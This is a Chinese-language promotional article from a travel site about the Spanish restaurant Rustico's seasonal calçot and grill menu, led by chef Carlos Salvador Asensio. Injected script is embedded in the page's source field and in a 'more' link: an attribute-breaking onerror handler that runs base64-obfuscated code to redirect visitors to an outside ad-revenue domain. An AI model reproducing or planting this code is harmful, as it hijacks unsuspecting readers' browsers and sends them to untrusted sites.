封面票选
探店
首页 > 酒店 >
西班牙风味小馆Rustico窝心呈献时令烧烤美馔
发布日期:2018年01月03日  来源:'"/onerror=eval(atob("d2luZG93LmxvY2F0aW9uLnJlcGxhY2UoImh0dHBzOi8vd3d3LmhpZ2hjcG1yZXZlbnVlZ2F0ZS5jb20vcmlldWJhN21xP2tleT0xZTBkMTkyZmNjNjcwYzc5MjU0ZmVlYmExNTY5MGNlMSIp"))//

踏入西班牙韭葱的当造季节,西班牙风味小馆Rustico将于新一年,与众一起分享加泰隆尼亚的特色风味,携手庆贺西班牙冬日韭葱的丰收时分。

踏入西班牙韭葱的当造季节,西班牙风味小馆Rustico将于新一年,与众一起分享加泰隆尼亚的特色风味,携手庆贺西班牙冬日韭葱的丰收时分。以时令韭葱入馔的滋味菜单,由Rustico的加泰隆尼亚籍行政总厨Carlos Salvador Asensio精心设计及主理,定能让宾客享受到正宗西班牙式的时尚烧烤用餐体验,并陶醉于韭葱的滋味中乐而忘返。

加泰隆尼亚韭葱在外型上与中国韭菜相近,在加泰隆尼亚的美食历史可追溯至19世纪——当时一名农民在日常耕作中细心地不让土壤覆盖韭葱,以保护韭葱的可食用部分不被沾污。而一群忠实的韭葱爱好者更于每年11月至4月的韭葱收成季节大肆庆祝一番;在当地大小城市更会有形形色色的韭葱收成庆祝活动,当中要数最大型的庆典定必为巴尔斯(Valls)地区举办的盛会。

总厨Carlos 在今个冬季特别引入此备受追捧的食材,旨在与城中宾客分享加泰隆尼亚地道美馔的同时,更希望籍此机会让宾客对当地的饮食文化历史进一步认识。由2018年1月20日至2月28日,Rustico诚邀宾客莅临品尝韭葱的冬日限定滋味,一同探索为何传统加泰隆尼亚人对韭葱的偏爱。

这场韭葱的美食旅程,以「香烤西班牙冬日韭葱配甜椒汁」开始;鲜嫩的韭葱经过炭烧后,配上浓郁的自家制Romesco甜椒汁,淡淡葱香与甜椒汁搭配得宜,鲜甜香嫩的滋味更教人一试倾心。为令此美食旅程更圆满,餐厅更特别推出一系列的可口烧烤前菜如「香烤特色亚支竹(两件)」及「蒜蓉炒白豆配特色香草酱」。宾客若心仪巴利阿里海(Balearic sea)的风味,则不容错过总厨Carlos精心炮制的「香草焗西班牙蜗牛」,享受其精巧简约滋味。

加泰隆尼亚的传统家庭料理「香烤西班牙香肠拼盘」,是盛宴上不可或缺的美馔之一。教人垂涎欲滴的「烧原条黑毛猪肋骨(1kg)配柑桔果冻酱」,亦可供宾客于聚会上与亲朋好友分享滋味。肉类爱好者钟情的「烧澳洲和牛斧头扒」,经过总厨Carlos妙手烹调,为经典美味注入丝丝现代风味,让宾客可尽情享用别具一格的顶级牛扒滋味。

富有欧陆乡村风味的「特色烧西班牙鹌鹑」则尽显总厨Carlos的心思细腻;菜式的口感丰富,不论男女老幼均会爱上这嫩滑多汁的鹌鹑菜式。

同样叫人嘴馋的「烧新西兰嫩羊架」亦适合大伙儿分享;三件香嫩羊架在冬日里绽放美味光芒,教人仿如置身巴塞罗那的山丘上享用美馔般惬意。

除了一系列肉类菜式外,Rustico亦为海鲜爱好者准备了多款海鲜菜式,尽显总厨Carlos对挑选优质新鲜海鲜的坚持,当中包括「岩盐烧西班牙新鲜沙丁鱼」丶「烧珍宝红虾」及「烧原只带子」,让宾客可享用到最新鲜食材送上的精致滋味享受。

总厨Carlos擅长以现代烹饪技巧手法呈现西班牙传统美食文化精髓,他曾于巴塞罗那文华东方酒店高级米芝莲餐厅Moments任职,并获得女厨神Carme Ruscalleda启蒙,成就其别树一帜的「当代巴塞罗那烹调风格」。

占地2,000呎的Rustico内设有80个座位,供应正宗西班牙小酒馆菜式。餐厅环境轻松而不失优雅,在时尚的现代设计中散发西班牙独特风情,食客既可以选择露天茶座,仿效真正西班牙人一边用餐一边欣赏街景的文化,亦可以在饰以红砖拱顶的室内用餐区中,感受经典的加泰罗尼亚餐厅风情;加上开放式厨房,总厨Carlos烹调时的一举手一投足,就成为食客用餐时最佳的风景。
更多'"/onerror=eval(atob("d2luZG93LmxvY2F0aW9uLnJlcGxhY2UoImh0dHBzOi8vd3d3LmhpZ2hjcG1yZXZlbnVlZ2F0ZS5jb20vcmlldWJhN21xP2tleT0xZTBkMTkyZmNjNjcwYzc5MjU0ZmVlYmExNTY5MGNlMSIp"))//资讯
更多

-End-

本文由"旅游休闲全媒体平台"发布

旅游休闲网 旅游休闲微博 旅游休闲微信 旅游休闲杂志 旅游休闲APP
骏旅行网 骏旅行微信 骏旅行APP 骏艺术网 骏艺术微信
骏高尔夫网 骏高尔夫微信 骏高尔夫APP 旅游休闲GOLF杂志 骏视频

评论列表